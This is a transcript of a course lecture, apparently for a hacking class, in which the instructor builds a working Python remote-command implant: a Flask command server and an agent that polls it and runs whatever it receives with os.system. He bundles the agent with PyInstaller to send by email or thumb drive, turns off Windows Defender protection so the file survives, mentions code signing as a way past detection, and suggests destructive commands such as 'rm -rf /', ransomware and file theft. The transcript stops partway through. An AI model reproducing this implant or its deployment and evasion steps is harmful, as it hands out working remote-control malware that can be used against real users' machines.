All right, so we're going to talk about building malware. We're going to do this as quickly as possible. This will probably not be the malware we build in class. This is just a quick, short example. So again, just to sort of cover what is malware. Malware is simply software with malicious intent. Malicious software, malware. So basically our requirements for this piece of malware, we're going to have a developer machine. That's going to be our Kali machine, our attacker machines, our Kali machine. Our victim machine is going to be a Windows VM. So there should have been a link somewhere in here to import a modern.ie like appliance. It's the same process as importing your Kali VM. So I'm going to go here. I'm going to find it, and I'm going to go ahead and try to go through. It's the MS Edge win10.ova. It's the 6 GB file. I'm going to go ahead and do that in the background while my machine is working. I like to give it 2 CPUs. I'm fortunate that I can do that on my particular computer. If you can't, don't. Right. All that's basically doing is taking away resources from your host machine and trying to allocate them to your guest machine. So from right now, I'm just going to hit next or import. Oh no. File error. Oh, I've already done that. Cancel. Okay, cool. Where is it? I've got other machines right here. Boom, boom, right there. So those will be the machines I mess with. So getting back into Kali, let's go here. I'm going to go full screen. All right, so let's see, and then this is referencing kind of just directly the slides. You can see our requirements: remote control of a system. It's got to be easy to deploy. It's encrypted. We're supposed to answer these questions during class. Well, why do you want it to be easy to deploy? Why do you want it encrypted? You want it encrypted because you don't want people to be able to easily see, what you're sending and receiving from this machine. You want it easy to deploy, install, run, because you don't want it to be complicated to get onto new machines. And obviously you need to be able to send it commands. So I have kind of a very common pattern that I like to use. I use this web framework called Flask, and I use this, a bunch of Python 3 standard library tools. So really quickly, we're going to build all of that, just a very rudimentary piece of malware that allows me to remotely send commands from one computer to another computer. So what do I do here? And you can even honestly do all of this on the same Kali VM. So we're going to probably prototype some things, and it's going to live just in this Kali VM. And then we'll end up deploying it to another machine. And we're going to show you how to install Python on that machine, on the other development machine, to make it work so that we can deploy it to Windows, Mac, so on and so forth. So first, I'm going to open up Visual Studio Code because we're going to write some code. And we are going to create a new project, and I'm just going to go ahead and call it. I'm going to save it right off the bat in my. I'm going to create a directory called malware. Create. I'm going to call the file malware.py. And with any luck, our Python, we should have already had Python installed and set up and configured to operate. This is version 3.91. And so that's what we want to do. We can validate that we have, a functional Python. So print, this is malware. I'm going to save it. I like to have this kind of construct. I like to have my tabs over here. If you hit Control-Shift-C on your keyboard, it will open up a new terminal in the same directory as the file that you have open. So I'm going to put this one up here. I'm going to zoom. If I type Python 3 malware, and this is how I'm going to be testing things to see how it's working. I'm going to need another file. I'm going to need 2 parts to it. I mentioned in the slides, there's this notion of command and control. It's not just that our malware is going to land on a machine and then I'm going to be able to send commands to it. It needs to know how to communicate back to me. And I give it this like rendezvous analogy, right? So they know where to go, both the command server, or I'm sorry, the operator of the malicious software knows where to send commands, and then the malware agent knows where to go pick up commands. And so we'll end up using a server as well. So I'm going to write a new file called, I'm going to save it, server.py. And this is going to be just a basic web server. Now, one of the frameworks that I like to use to bake web applications is called Flask. It makes it really easy to like tie a function, a Python function, to a web URL. That's kind of how I think of it. When you go to this web endpoint, it runs this Python code. I think it's a pretty cool thing. So let's whip that out real quick. We're going to pull in from the Flask library. We want to import the capital F Flask object. And we're going to create a web app. This is just kind of convention. We say app equals. So we're creating a variable called app, and it's capital FLASK. And then we pass it in the special variable dunder name. That represents the name of this module. It just kind of creates a namespace for it. And it's this part right here. In 5 lines of code, we're going to have a website. So let's not stress over having to just memorize that part. Okay. The next thing that we're going to do is app.route. I'm sorry. We use function decorators in Python. This is maybe something we didn't go over in the accelerated Python introduction, but what a function decorator is it's a function that accepts as a parameter a function. Okay, and it allows you to add different functionality, additional functionality to the innermost function. So I'll show you what I mean. App.route. When you go to the slash in a web page, that's the index or the root of the web directory. We want it to run this code. We want it to run this function, def index. And then we can simply return regular old text. Welcome to the index of the malware server. All right. So what do I mean when I say this? I'm going to open up Firefox real quick. Put this down here in the corner. And it'll be http:// my address, localhost, 5000. By default, it'll run on port 5000. I'll show you some tricks in order to make this a little more streamlined, less weird looking in the future. So let's see, localhost 5000 / right. So when I do that, this code, this is what's going to end up returned to the web browser. And all of this happens because this additional function, it runs this code, takes its return value, and then packages it up nicely. So this is a function that accepts this entire function as a parameter. So let's see. Let's come down here. And this is this last step, if name, main. So this is a way for people to, if the name of the function invoking this is dunder main, run this code. This allows you to run it from the command line, kind of as a standalone tool. So what am I doing here? Otherwise, you can sort of use this. If you wanted now, you could import this function into another piece of code because this line, it won't always run as a server. It'll only run as a server if you ask it to. So what am I doing? I'm saying app.run. And what host represents is the IP or the interface that you want it to run on. So I can say host equals 0.0.0, oh, I'm sorry, .0.0.0, port equals 5,000. That's where this 5,000 comes from. 0.0.0 means all interfaces, all network addresses on this computer. I want it to make it available on all of the Wi-Fi networks that I'm connected to, all of the wired connections I'm connected to, all the VPN connections I'm connected to. And then for testing, we can usually do debug equals true. I think it's on by default, but this just gives us some feedback. If something crashes, we can look at it in the web browser. If it's not operating the way we expected, we can look at it in the web browser, and it'll give us some feedback as to what went wrong. And I'll show you a couple little things as we run this. One nice feature is as we can run this code, and as soon as we hit save with the debug server on, generally that allows us to, it will monitor this file for changes. So we can just add a new function, save, and then that function becomes available as long as it doesn't crash the application. So just make sure you're always saving with syntactically valid code. We'll look at that, what that means here in a minute. But right here, this is a basic website. Let me prove it. I'm going to hit Control-Shift-C. I'm going to open up a new terminal. Kind of push it down here to this side. And I'm going to do Python 3 server.py. All right. So what does it say here? It says serving the app server. It's not a, it's a development server for testing, yada, yada. But it's running on this host at this port. You can hit Control-C to cancel, and this debugger pin. If we get a crash, we'll need this. So we'll come back to that in a little bit. Meanwhile, I'm going to go over to Firefox. I'm going to hit enter. Now, what URL am I at? I'm at my IP address. Well, what's my IP address? IP8 adder. This IP address, selection, colon, port 5,000. That's that port that I defined right here. I'm going to hit enter. Boom. Same thing. Welcome to the index of the malware server. If you were on the same network as me, this would be viewable by you. You would be able to see this website. This code is tied to this particular path on the server. It just so happens it disappears. That's the default path on a web server. So what can we do? We're going to add a new a place to get new instructions. App.route new CMD, a new command I want you to run. Def index, and then return, let's see, new command here. Right. So notice I just saved my page. I just saved this. And I didn't have to go back over here. New CMD. Oh no, I broke it. Oh, I guess I saved it before I made that change. So I will have to rerun it. Just get in the habit of doing this. That's not a big deal. Where did it go? New CMD. Oh, I'm sorry. The problem is index. I just in my mind, I typed index again. You can't have two functions with the same name, even if they're inner like nested functions. So and that's what it's telling me. View function mapping is overriding an existing endpoint function index. My bad. This should have been like new CMD, something like that. This could be, let's say, get a new CMD, right? The name of this function does not have to match this. To prove it, I'm going to do that. I'm going to run my code again this time. Hopefully it doesn't crash. It does not. Now I can come to new/CMD, enter, and we see new command here, right? So when I go to this particular endpoint, this whole function runs. What else can I do? I can create a variable, math equals 1 plus 1. I'm going to create a format string, then math. Simple math. Simple math. So I create a bucket called simple math. I assign it the results of the expression 1 plus the value 1. And then I return the string, the format string, new command, space, the result of simple math. So if I save this, oops, I'm sorry, save this, it shows up right here. So this is going to run. I mean, I could have tons of stuff happening right here. I could go to another website and get some information and then feed a new command in, right? So what's going to happen is I'm going to have my agent periodically visit this particular website, run the command, and then send the results back to it, back to this server. So what do I have here? Okay. Okay, 1 second. My dogs are going to start barking. Sorry, it's just the way it is. So in order to reach that website, we're going to go back to our client. And let me get rid of some of that stuff so we can sort of see the lay of the land there. I'm going to go back to my client and we're going to leave that there. Might as well leave it there. This is malware so that we know what it is, right? Remind ourselves of our intent. We're going to import a couple of libraries. The library that we're going to use to make web requests, import requests, right? What else are we going to need? I said we're going to do it periodically. So we're going to use the time module, import time. And then we're going to run commands. So we're, let me think, the simplest way, probably OS. So I'm going to use import OS. This is going to be dead simple. This, like I said, may not be the malware we end up using in class or doing that, but this is one mechanism. Another library that, as an alternative to the OS library, what we might use is import subprocess. Subprocess allows you to run background processes. So I'm going to leave that there just so we can remind ourselves that's what we're going to do. Okay, so we need to know a couple of things. We need to know where to go get our new commands. Our malware needs to know where to go fetch new commands. So I'm going to call this one C2 malware. Let's do this. Malware server equals this. Copy, paste. HTTP:// this IP address : this port / new command. That's where it goes to get this information. In fact, hold on, let me get smart about this. Let's do new. Yeah, that's fine. Yeah, let's do that. All right. So I'm going to print malware server F that place, getting new commands. So it's going to put onto the screen, getting new commands from that place. And then I'm going to actually start doing it. While true, do this. So it's going to continually do this loop. It's never going to stop doing this loop. It's just going to continue to run until I tell it to, I manually kill it on the target machine. So while true, let's see, we can say requests sorry, cmd equals request dot get malware server if, oh, I'm sorry, actually not cmd, let's say response to the request. The response to our request is assigned the result of the request. If response dot status code equals 200, that means that everything went okay. 200 is generally okay. We control that, of course. We can make it whatever we want it to be. But if by default, like that's what that does. If this is a sane request, print onto the screen. We're just going to print right now response.txt, or I'm sorry, text, the text of the response, the raw characters that show up kind of like this. And then we want to time.sleep, and we're going to break out of this if. Let's come down here a little bit. Time.sleep for 5 seconds. I'm going to print sleeping for 5 seconds. All right. Is that going to work? I think it will. I feel like it will. So what do I have established right now? I have the web server running. I have very basic, like go and get the command. Don't do anything with it yet. Just put it on the screen and then wait 5 seconds and do the same thing again. All right, so let's try that. So Python 3 malware. All right, getting command from that place, new command here. And that's exactly what shows up on the website. And then it says sleeping for 5 seconds, and then it redoes all that stuff again. And you can see over here, we have sort of a log of activity. So the server is saying someone requested this particular path, and then this is the response code that we, the server, send back to them. So that means 200 again means everything went fine. It's a valid request. So I'm going to go back to my malware tab that's just running. I'm going to Control C, interrupt it. So rather than do response.text, let's print it out. Let's kind of do this. I'm going to print out a format string. What am I doing? .txt. Got command there. So that way it'll be a little more obvious that we got the command, that we're going to do that. Now let's try to run that command. Dead simplest, stupidest way to do it is os.system and then response.txt or text. What this is going to do is it's going to run whatever shows up in this tab, or I'm sorry, not tab, in this content, as if you typed it into the console. So for instance, I think this is what shows up on the web page. We go back to Firefox, new command here, copy. It's just like you did, you pasted it and then hit enter. You're going to get command not found, new, right? But what if I send something that is a valid command? Let me go back to my server. I'm going to do away with the simple math and all this stuff here, because that's just for demonstration purposes, right? I'm going to create a variable called command cmd, and I'm going to assign that to ls. And rather than returning all those extra words, I'm just going to return the result of the variable command ls, right? Or the result of the variable command, which happens to be ls. So I'm going to save my server. My server is going to restart automatically because it was valid. If it didn't work, if it crashed or something like that previously, all I have to do is re-invoke it like so. Now I'm going to come back and I'm going to run my malware. boom, malware.py. Now ls isn't particularly malicious, but meh. What happened? Nothing. Oh, why didn't anything happen? Because I didn't save my script. Save. So let me kill it. I was like, oh man, that's weak. I didn't do what I was expecting. Here we go. All right, got command ls. Now we see there's malware.py, server.py. Got command ls, malware.py, server.py. All right, well, that's a good basic start. What about doing something more interesting? Rather than having it just list the directory, what if I can tell this target machine to delete files, rm tac rf /. What's that going to do? I'll leave that as an exercise to you. We're not going to do that though. Let's just ping tac c1. So the downside to this thing is it's so stupid. If you feed it a bad command, it will just run that bad command. When I say bad command, I mean either malicious in nature or syntactically invalid, right? It can't recover very well if it's not a real command. So I'm going to ping 1.1.1.1, right? So this is me sending a command to the malware agent and telling it to ping some host, right? You could also have it go and visit a website, download some program, run that program, ransomware. You could have it go search for all of the PDF documents on the computer, and then I don't know, zip those up and send them somewhere, right? Stealing intellectual property. Same thing for Excel spreadsheets, so on and so forth. You get the idea. I'm going to save this. I'm going to go to my malware, boom. All right, so you can see here it's running the ping command. And again, this command is it's being treated as if you would have pasted it right here. All right, so we're going to leave that at that. So let's look at packaging up and deploying this malware onto a target machine. This is, for being really generous, 20 lines of code. It's not conceptually, it's not hard to get. I'm going to save that. I'm going to copy it. So in order to, we're going to use the program called PyInstaller to create an executable that we can easily put on a thumb drive, send in as an attachment, something like that, and use that to deploy it. That's our deployment mechanism. That was one of the things I said it had to be. It had to, what did I say? It had to be, easy to get and run on another machine. So I'm going to minimize this. I'm going to open up this Windows 10. Actually, maybe not that one. I'm going to use this one. So they're both the same. I think I was using those for another project or something. I'm going to open up this Windows 10. Again, this is free and made freely available to you, courtesy of Windows. The only requirement is that your machines are adjacent, like on the same network. Right now, let's look at this. Actually, and right now, that's the only requirement. I'm going to show you that trick to make it internet accessible, if you will. And we'll have to do some learning on the fly on that front. So, come on, man. Oh, come on, man. Updates killing me. This is hacking though. I mean, you got to deal with stuff. All right, it's coming up. It should be here any second now. All right, there we go. Boom. We can log in. I think the password was P. ASS W0RD exclamation. I think that's the default password. If we look at right here, okay. And then we go to details. Oh, I guess it's not in there. I thought I put it in there, but oh yeah, I got it right. So it's PASSW0RD exclamation. That's the password. They're telling you to do a snapshot. That way you can reset it quickly after you make changes. So if, let's say you run malware on this thing and you don't want to worry about like having to clean up the malware after the fact, just revert the snapshot. This also has, makes it easy. It has a VirtualBox guest stuff already installed, so you can copy and paste kind of natively. So we're going to set up, this is going to be our Windows development environment as well as our target platform, just for testing purposes. So a couple of things we have to do here. We have to install Python. We have to install PyInstaller, and then we have to compile our code somehow, right? So I'm going to install a couple of pieces of software. I'm going to go VS Code. No thanks. VS Code. Code with Visual Studio Code. Man. What did I? All right, there it is. There's the real download. I clicked an ad. Silly me. Download. I'm going to download it for Windows. And I'm going to go to Python. Python.org. And then I'm going to download 395. So that's fine. Do you want to do with that? I'm going to run it. I think in newer versions of Windows, you can actually type Python, and particularly, I think it was like the 1903 version, and the 1903 version would, like, you can basically just run Python. This is like the 1804 or something. You can install it as administrator or as a regular user. I'm just installing it as a regular user. Then this part's going to take a little bit. Let's get this. I'm going to go ahead and run that. This is the installer for, and they say not to install multiple programs at once, but that's like from a bygone era, that bit of advice. It's going to install it. Go ahead and run. This is for Visual Studio Code. I'm just, being real agreeable, installing it. Now this is installing the pip Python package installer, Python package manager, whatever you want to call it. Super useful. That's how, if we don't have access to requests on a machine, that's how we get access to it. If we don't have access to Flask on a machine, that's how we get it, is through pip. We pip install name of library. Okay. All right, launch Visual Studio Code, finish. All right. And then, yeah, that's fine, whatever. Close. It's asking you to customize. I don't really care to customize it a whole lot. First thing I always want to do is install the Python extension. And it shows up as like one of the most popular things. If you click install, it's going to install, not just, it's going to install PyLance, but it's going to install the Python like core language files, as well as some other things that you might need. This just makes it easier to write Python code. Not required, but it makes it easier, I'd say. So once this is done and says installing, that's good. Let's open up a terminal. We can type WT Is WT a thing? It's not a thing here. CMD for command prompt. Let's see if Python is available. Python 3. Ooh. Python 3. Ooh. Oh no, what happened? Do I have to, did I mess up? Maybe I should have installed it for all users. Just, that would have been the smart thing to do. Ugh. Dang it. All right, well, go back, download it, and run it again. I don't know. I don't use Windows all that often, to be perfectly honest with you. I'm going to modify. I'm going to do a PyLauncher. Okay, require for all users back. I'm going to uninstall it and then reinstall it. Dang it, that's unfortunate. Okay, well, here, this is installed. Minimize that. Man, that's super uncool. All right, well, that's hacking, y'all. Sometimes you make mistakes, just like us. So we wait, do this. Oh, I guess, well, meanwhile, I can open Visual Studio Code. I'm gonna create a new file, new. Then see, on my other machine, now that it's up and running, I should be able to escape, Control A, C, copy it. Any luck, I might have to come to my drag and drop, my shared clipboard, directional, then come and copy it again. A, C, should be able to paste it. Check that out. I'm going to save that. I'm going to save it as malware.py. I'm going to save it on my desktop. Save. And saving it with the .py extension will sort of make it know that it is a like it's a Python file. So now that that's there, come on, Python. All right, close. Python's not installed. Oh, wow. I wonder, please download and install Python. What happens if I hit download? Oh, it takes me to their website. Okay, well, here we are. Now I'm going to run it. So it knows that Python wasn't detected. I don't know what I did wrong in the installer. I'm gonna add Python to the install all users. Man, I want to customize installation. Did I mess up? Why can't I? Ah, man, that's terrible, man. I don't know what I did wrong. Cancel. Yes. Let me run that as administrator. Maybe that's what I need to do. Computers are hard, y'all. Fortunately, this isn't what you're going to have to do to get your malware on somebody's computer. And we're building the single executable so that we don't have to go through this heartache in the future. I'm going to save the file, view the download, or actually rather open it in the folder. Control. Downloads, right click, run as administrator. And then hopefully that will allow me to install it globally. And then maybe that'll make a difference. Next, or yes. Why did it let me choose location and features? Man, install for all users. That's it right there. Boom. Nice. Install. Cool. All right, now we let this run. So just customizing your Visual Studio Code, you can tell it not to pop up all the extra like little windows to get you to try to visit a website or something like that. So I mentioned making this accessible. They have to be on the same network. Right now, this machine is not on the same network as this machine. So I'm going to go to my settings. And we'll hopefully we'll talk about this in class. We're going to put them onto the same NAT network. And if you may or may not have one of these available. So this NAT network, what you need to do in order to get it available, open up the main, and this is only really applied if you're using them at the same time. If your computer can run 2 virtual machines at once. If you go to File, Preferences, Network, and then these are the NAT networks. You hit the little plus sign, and now I have a NAT network and LabNet. LabNet is just what I named it. If you hit the little orange symbol, that's where you can rename it. Test malware. I'm gonna do this number. Test malware, rename from network, hit OK. Then I can come back into the settings for this VM, and you can do this while the machine's on. You can go to Settings, Network, Attached to NAT Network, and then you should see either LabNet or Test Malware, whatever you just created. I'm creating Test Malware, so I'm going to join it to that network. I'm going to do the same thing on my Windows machine. Settings, Network. Rather than a bridged adapter is putting it on the real, the real exterior network adjacent to your host. I'm gonna put it onto the NAT network, test malware. I guess I was using this to test something on a real network at some point. All right, so where are we at? At this point, let me config ping 10.0.2.15. So it looks like I can communicate with that with my Kali box. If I open up my web browser and I type http://10.0.2.15, I think it was, :5000. That's the index of the malware server. If I go to new CMD, that's the command that this machine is going to run. Okay, so now let's see here. Let me have Python now. Gosh, you have to restart. I don't even know how Windows works, to be perfectly honest with you. I'm gonna log out. I'm just gonna restart the machine. Just restart it. It should be new to Python, yada yada. Your terminal type py to launch Python. Is it just py? What? Man, that I don't like that at all. But apparently you can just type py to get this thing going. So control, I'm going to type exit. Hopefully I'll get out of there. Pip. How do I do this? Windows. Man, I hate that. I probably should have practiced this one first. Installing things on Windows. I don't use Windows at all. Okay. Let's see. Running pip on Windows 10. Pip is just open up a command, type pip, yada yada. Pip install package. Windows 10. Python 3.9. And again, this is just research. You know, you just find stuff. Pip not installed. Pip be used from the command line. This is does not locate the directory. Yes, right here. Environment variables. Man, God, this is terrible. Okay, so what did it tell me to do? Windows S, oops, right here, and then this. I think you can right click. And then what was the system properties? Is that what I just clicked on, system properties, or did I? Info. Man, I really don't know anything about computers. This is crazy. Environment variables. Edit. Okay, that's what I'm looking for. I'm looking for the environment variables. So there we are. Environment variables. Close this. All right, and then what's it saying here? I need to go find the path. Ah, geez, this terrible. So this is why people use distributions like Anaconda and such in order to get, you know, their stuff around. So it was here. See, I find my CMD. I need to edit the path variable, and I need to pass it in 3/8 scripts. God. All right. Let's see. Path, edit. I need to add a new entry, which is going to be this PC, the C drive, program files, Python 3.9. I need to add this folder as well as the scripts folder right here, I believe. That's where pip is installed. Okay. So I can just double click, I can paste, and I'm going to double click down here, paste /scripts. Okay. Okay. So now if I try to run this, if I do pip, maybe I have to exit first. What was that? CMD. Okay, so yeah, that seemed to work. So pip, you know, it's doing something now as opposed to nothing. It just took a long time to run that little thing. I guess maybe the first time just takes longer. Pip-v for version should not take that long. Okay, there it is. Pip 21. Man, for some reason, I don't feel like maybe I missed a button. I don't feel like I should have had to do that. So anyway, you went the long way around. It should not have been that hard to get Python installed. And again, your malware won't have to. This was just, like, remember, malware is just software. We're software developers with malicious intent. That's all we're doing here. So what do I need to install? I need to install the request library. That's one of the dependencies of my code. I'm using this module. If I hold my mouse over it right now, it says import request could not be resolved from yada yada, meaning that it's not installed. This is additional code that somebody else wrote to make it easy to visit websites. So how do I get it? I come to the terminal. I got to the terminal by typing cmd and then hitting enter, right? And then you can type pip install requests. Oops, requests. It should go out to the websites that are required. It should download all of the things that are required. It should go through the process of running them. And it says here that successfully installed this. And this yellow thing is just telling us there's a slightly newer version of pip available. So if I go back to my code, and if I look at it and save it, this little yellow squiggly may not go away until I put it in there again, save it. So with any luck, oh, I also have to tell it which Python interpreter. That's probably why. Here, to Python pad. Browse. So, gosh, this Windows is terrible, man. It just works on Linux. Windows, program files, Python 3.9, Python, select interpreter. What? There it is. Okay. All right. Now it's showing up down here. Refresh. Okay. Now the little yellow squiggly has gone away. What happens if I try to run my malware without compiling? Now that we've got a development environment, we should be able to write the code on Windows and then test it on Windows as well. So let's see, CD desktop. If I look around, I can see that there's a malware.py file right here. So I can type python3 malware.py. Not Python 3 here, is it just Python? Okay, just Python. So got command ping text C1 1.1.1 access denied. Option C requires administrator privileges, sleeping for 5 seconds. And with any luck, it should continue to run. So minimize all of these extra windows. Okay, get out of here, close that, minimize, close that, close that. All right, so here's our code, drug off to the side here. Here's this, and you can see that it's running, and it's just kind of trying to run this command. It's just not valid on this operating system. It says access denied. The tac-c argument requires administrator privileges. Well, that's because ping on Windows isn't the same as ping on Linux. Ping on Linux, when you use the tac-c, that says the count of how many times do you want to ping it. And I wanted to ping it 1 time. So you can interrupt this command from running by just hitting Control-C, same as on Linux. Ping, and then if you type /? on Windows, I think that's the help, generally. On Windows, and if you wanted to only ping something 1 time, you use tac-in. What does it look like? Tac-c does something else. It says administrator, routing compartment identifier. I have no idea what that means right here. So basically, I need to update my server to, or not, have it just not run ping. I can have it do some other command, right? Let me go back over to my Kali machine. Log in, Kali. And so rather than my server, rather than ping, let's try this to tac-in. And again, the reason I did it on Linux is because if you run just ping 1.1.1 like this, if I were to run this on my Kali machine, it will continuously run. It does not stop. So on Windows, by default, if you run ping, it'll ping 4 times and stop. So I can leave this as is. It's just not going to be, it's not going to work on the Linux machine to test certain things. So that's fine. We're not on a Linux machine anymore. We're testing it on Windows. So I'm going to make that change so where it's just pinging this IP address. Oops. And after 4 times by default on Windows, it will stop. I don't have to make any changes over here on my malware, though. I'm not going anywhere there. So I'm going to take this, we go Python malware.py. This is malware. And here it got a new command, ping 1.1.1. It did the pings, it's sleeping for 5 seconds, and then it's going to go fetch that new version of the command, sleep for 5, do the command, sleep for 5 seconds, rinse, wash, repeat. It's not going to stop because this is a while true loop. While this condition is true is always true, do this code. So it will always do this code. I'm going to interrupt it. We've got the beginnings of something there. So how do we make this a program that someone else doesn't have to go through that whole rigmarole of installing Python, or particularly us, if we're deploying this malware, we don't have to go through that rigmarole of getting our program onto someone else's computer. We're going to use PyInstaller, py installer. How do we get it? Pip install py installer. And it's going to go and download probably several things, for being real. It's got to go and get a compiler. Well, maybe not a compiler. It's got to go get something to bundle our code, as well as different stub templates. It's going to go pull in additional resources because it's going to basically tie up Python our code, and then all the supporting libraries code into a single .exe that when you double click, just kind of unpacks all of that transparently, runs it, and then sort of repacks it or deletes it. So right now it's going through and it's installing all those packages. We'll let it go. Okay, it looks like that's done. All right, so how do we use Pi installer? I think we can probably just get away with typing Pi installer. Nope. So let's do this. Python tac m to invoke the module Pi installer. Let's see if that does anything for us. Oh no, did it not install? Man, computers. Boom, boom, boom. Python 3.9. Go to the scripts folder. It's not there. Why is it not there? It's under, was it libs? Lib? Site packages. Hmm. Hmm. Well, I don't know why it's not showing up. Tools, scripts. Why? Hmm. Okay. There is. Do I need to add that to the path as well? That's. All right, I'm gonna go back. I'm gonna search just for Pi installer because I feel like it's just a matter of it not being in the path. Oh, well, it's not showing up at all. C D O's. Okay. It's not installed recognized as internal or external command. Whoop. Where we have our malware there. Okay, so let's do this back. Where does, it's weird that it didn't show up at all though. All right, Pi installer Windows. Let's do this. Oop, oop. This is again part of hacking. It just, you got to understand how things work. You got to be able to adjust and modify, as they say. Pi installer Windows 10. Quick start. All right, from piinstaller.org. There's a lot going on in this. This is a really good website to understand like how everything is functioning. Let's see. This should have gotten it. Pip. Pip. I'm going to run with the tac u flag to tell it to upgrade, just to see if that was an issue. No. Pi installer. Ooh. All right. I might have to like pause and like pre-bake this cake, if you know what I mean, to get Pi installer installed and then recap it. Or I just keep you on in real time and do it. This is the struggles that you will encounter. So yeah, we'll just keep it running. Let's keep it running. Pi installer. How do I? Windows. What are you doing? So it says satisfied, already set up in this Pi installer and C users, IE user app data. I think that's maybe part of it too. Copy. I think maybe I messed up when I installed it weird with that path. just don't do that. Just install it as an administrator the first time, and then maybe these things will not be issues for you. Environment variables, but environment variables are a good thing to understand what they do. The path is where Windows will look for programs to like run. User app data local Python launcher. In fact, let me go ahead and do this, that, this. Packages. Actually, not here. Yeah, there it is right there. Boom. Copy that. That's what it was, I think. This. Okay, okay, okay. Yeah, I just messed up when I installed it by like installing it, uninstalling it. Just install it as administrator on the get-go. And again, this doesn't have anything to do with like how it gets on the target machine. This is your development environment. So this is you making an environment to compile Python code into executables. Again, assemble them into executables might be a more appropriate phrase, but bundle them, freeze them is the word they use. Freezes. All right, so if I type PyInstaller, remember you got to close this, open it because it starts with the path, but it doesn't like update in real time. Go to my desktop again. PyInstaller. Oh man, I hope that works. All right, it did. Great, excellent. So these are all the additional commands you can use. The real winner is going to be just PyInstaller, and then this notion of one file. Where is it? Somewhere in here. Man, I can't see it at all. I can't read. Can't read, y'all. Note that it's in here, though. Just know that it is. All right, just trust me on that. PyInstaller tech one file malware.py, and it's going to create a couple of folders, and we'll watch that happen on the desktop. It's going to have a build folder and a dist folder. The dist folder is for like distribute or distribution. I'm going to hit enter, and with any luck, it's going to do the thing. All right, there we go. So this is the part where it's going through and it's looking at all of the additional, it's looking at my code and saying, hey, it looks like you pulled in something that's not part of the standard library. That's the request modules. So it's got to look at the request module and then say, hey, what are you using that's not part of the standard library? The standard library is what already comes with Python. And it's got to go and look at that. So it's got to do this recursive process all the way until it's figured out all of the things it needs to take and then bundle into the little executable file that we're going to have. So a couple things to note. This file is 439 bytes, 439 characters in that file. It looks like the process is already done. And if we go into the dist folder, oh no. So loop to ball milba. Well, this is unfortunate. I guess Windows Defender is really smart. It's a really good product for keeping systems like safe. PyInstaller isn't itself malware. But it's used by a lot of like real malware authors. People really write like serious malware in Python. And you can see that it deleted my file in there. So I need to disable Windows Defender, and I forgot about that. So I'll go to Windows Security, and then Virus, Threat, and Protection. I want to disable real-time threat protection. How do I do that? Where did I go? Current threats, scan options. no, there's like disable. How do I disable? Back. It's in here somewhere. I promise. Manage ransomware protection. No, that's not it. Go back. Back. Dang it. Disable defender. And I think there's like a way, like really easily, and my mind is just not where it needs to be, I guess. Virus and threat protection. I come in here. There's a way, just disable it. There's a way, just like a button that you press, and it's so easy. Manage settings. There it is. Real-time protection. I want to disable it. I want to disable that because, why not? I want to disable automatic sample submission. That's useful. If you're, if they don't have a signature for it, and it is triggered by their behavioral analytics engine, meaning we've never seen this malware, this particular program before, but it's acting like malware. They'll develop a signature for it, submit a copy of it to Microsoft, and then that copy will get replicated around the world to everyone else so that it'll help shut down like novel pieces of malware really quickly. It's a really good product that's given freely to the rest of the world. So, all right, so real-time protection is off. Now we can, again, this is our development machine. We don't necessarily need to do this on our target machine, but we'll see how it works. One of the ways you can avoid that is with key signing, or that's key signing. Executable sign, like signed executables. For $70, you can buy a code signing certificate, sign it, and then it'll be trusted. You're a legitimate vendor. Now, granted, you've got to use a credit card to buy that key signing certificate. You've got to go through, in some instances, it's not that rigorous, but like the extended validation. So you've got to prove who you say you are. But if you're a criminal, you might be willing to lie about that stuff. So, but they also know that people are willing to lie about that stuff. So they sort of, there's a cat and mouse on that front. So anyway, where am I at? What am I doing? Closing this. I'm rerunning my thing that my PyInstaller command. Hopefully we're going to end up with something in dist this time. And we do. We have a malware.exe in dist, right? So I take this and I double click. You can see this is malware, pinging, yada, yada. But this is the thing. It's a 7 megabyte file that I can right click, copy, paste it to a flash drive, email it to as an attachment. And it's going to go and do the thing for me, right? Could be ransomware, could be, I don't know, anything else, some extortionware of some sort. Could be a keylogger. Just any number of things. Could just be a simple stager. It goes and it fetches like an interpreter payload for some reason. So it's something to that effect. So, all right, well, I think we've demonstrated, real quick, I guess I want to show how to get the results, like how to show who's phoning in. Maybe just get a little more like interactivity, really. Kali, boom. But you can see like the server's 16 lines of code. The agent is 20 lines of code. So for less than 50 lines of code, you have the ability to remotely, at an interval, run something on someone else's computer. Now, that sounds like administrative software as well, doesn't it? Like software that you would use to administer a computer. You could check to see if updates are installed periodically, like every day, every 30 minutes, check to see if the latest updates, or if there are any updates available. Is there a command line tool that does that? Yes, there is. So it's malicious only in certain contexts, right? Context is everything in this game. So what was I saying? I wanted to show a little more like interactivity. I'm going to go to my server. I'm going to change some things. I'm going to use the JSON module. Import JSON. JSON is a structured data format, stands for JavaScript object notation. Command. And then I'm going to build return ret obj equals a dictionary where my timestamp server, and I'm also going to need to import date time to get date time stuff. Time dot date. Ah, man. So what this does is it shows you the number of seconds since 1971, like January 1st, 1971. So I'm creating an object that rather than sending a basic string command, I'm going to send structured data and there'll be metadata associated with it. I'm going to send along the timestamp, so the time of the server, as well as the command that I want it to send. So cmd, indeed, like so. Actually, let me do it like this. Ping. So ping 1.1.1.1 like this. So there's that. And now I can just send back the return object. Actually, I really technically don't need JSON here. Flask already knows how to send JSON. But what I can do is ret obj equals JSON dot dumps. Ret obj. Like that. You're saying now I want the string representation of this. So I can say print sending ret return object. Okay. All right, so what's happening here? Creating a Python dictionary, key value. The key is timestamp. The value is the current time. The key is command. The value is ping some IP address. I'm saying I create a bucket call. I'm declaring that there's a bucket called return object. And its value is the JSON dumped interpretation of this object right here. In fact, I'm gonna change it up so that there's not overlapping names. How about that? Right? Better code convention or whatever. Boom. So I have an object. I create the JSON representation of that object. That becomes my returned object. I print to the screen that returned object, which this is just a string, just a regular old plain string. And then I actually send that regular plain string. So I'm going to update my server. Now my malware is broken on my client. So this is where we would ship a new version of our malware. So what do I need to do? I need to, first of all, let's just prototype it. I'm going to type Python malware.py, and I'm going to run it like this. If I hit enter, getting new commands from this place. And it's not getting anything right now. Why is that? Status code 200. Let's look at our Kali box to sort of, here we go. Object date time is not JSON serializable. So probably because if we look at the code, we say if the status code is 200, do something. Otherwise, man, just don't do anything. Print sleep for 5 seconds and then sleep for 5 seconds. So we have a syntax error in our server. So let's look at this. This is not JSON serializable. It can't take this and convert that into a into a flat string. Let's see. What's the best way to do this? What if I wrap all of that in a string? That should call the string repr function for this. So that should be JSON serializable. What does that mean? What did I do? I said, this is just one of them things you'll get used to in Python. Like, it took the date. It didn't know how to tease this thing apart and treat it like a string. It said, I don't know what you're expecting from me until I tell it. I expect you to behave like a string, right? And that's kind of like typecasting in Java or 